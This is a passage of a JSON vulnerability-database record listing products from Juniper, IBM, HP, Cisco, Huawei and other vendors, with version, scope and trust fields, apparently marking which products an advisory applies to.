"vendor": "ibm", "version": "9.1" }, { "model": "ssl vpn 8.0r4.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "advanced settings utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "msr1000 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "spa525 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "junos 13.1r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "(comware family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12500v7)0" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.2" }, { "model": "cp1543-1", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "1.1.25" }, { "model": "ive os 7.4r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "secure analytics", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "advanced settings utility", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "eupp v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "msr30 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "nexus series fabric extenders", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "security network intrusion prevention system gx6116", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "strm 2012.1r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "junos pulse 5.0r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "telepresence mxp series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "junos 13.3r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "documentum content server p02", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "sbr global enterprise", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "espace u2980 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "uma-db v2r1coospc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management hf6", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jsa 2014.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.2" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7900.00" }, { "model": "usg9300 usg9300 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s12700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "f1000e family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.4" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "desktop collaboration experience dx650", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 12.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "oceanstor s2200t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "19200" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.3" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600-" }, { "model": "hsr6602 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "espace u2990 v200r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.0" }, { "model": "secure analytics 2014.2r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s7-1500", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "s2900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "srg1200\u00262200\u00263200 v100r002c02spc800", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dsr-1000n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "open source security information management", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.10" }, { "model": "junos 13.3r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.6" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "ei switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51200" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.0" }, { "model": "svn5500 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1" }, { "model": "junos 12.1r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "simatic s7-1500", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "1.5.0" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0.1055" }, { "model": "msr50 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.7" }, { "model": "usg5000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "idp 4.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.9" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.5" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7700" }, { "model": "strm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.4" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "msr50 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4x27" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "junos 12.1x45-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.4" }, { "model": "junos 13.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "junos 13.2r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "u200s and cs family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "security threat response manager 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s12700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s5900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.10" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10648" }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.9" }, { "model": "esight v2r3c10spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "isoc v200r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.1" }, { "model": "software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.4" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.3" }, { "model": "security information and event management hf3", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.1.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "hsr6800 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "documentum content server sp2 p13", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.5" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "s3900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.01" }, { "model": "switch series (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v5)0" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "anyoffice emm", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2.6.0601.0090" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ddos secure", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "5.14.1-1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "s2750\u0026s5700\u0026s6700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "tivoli storage flashcopy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.12" }, { "model": "vsm v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos os 12.3r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "simatic s7-1500", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "1.6" }, { "model": "strm/jsa 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ngfw family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "powervu d9190 comditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.3" }, { "model": "junos 10.4r16", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "junos 12.3r4-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "security network intrusion prevention system gx5108", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.203" }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "msr50-g2 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "ive os 7.4r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "security network intrusion prevention system gx5008", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "usg9500 usg9500 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "softco v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server sp2 p14", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "junos 5.0r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s2750\u0026s5700\u0026s6700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006c05+v100r06h", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "junos 12.1x44-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ive os 8.0r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oceanstor s6800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "11.16" }, { "model": "junos os 14.1r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "junos os 13.2r5-s1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "ecns600 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sbr enterprise", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "ive os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "telepresence mcu series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "jabber voice for iphone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asg2000 v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "oic v100r001c00spc402", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.0" }, { "model": "junos os 12.1x46-d25", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "uacos c5.0r4.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx4004", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 13.1r.3-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "nac manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s7700\u0026s9700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smc2.0 v100r002c01b017sp17", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.6" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58000" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.8" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.7" }, { "model": "junos os 12.1x46-d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "dsr-1000 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v20" }, { "model": "junos 12.1x45-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "tivoli storage flashcopy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "security network intrusion prevention system gx7800", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "uacos c5.0", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "strm/jsa", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "logcenter v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "oceanstor s5500t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "dynamic system analysis", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "imc uam", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.00" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "ssl vpn 7.4r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "usg2000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dsm v100r002c05spc615", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 10.4s", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.6" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": 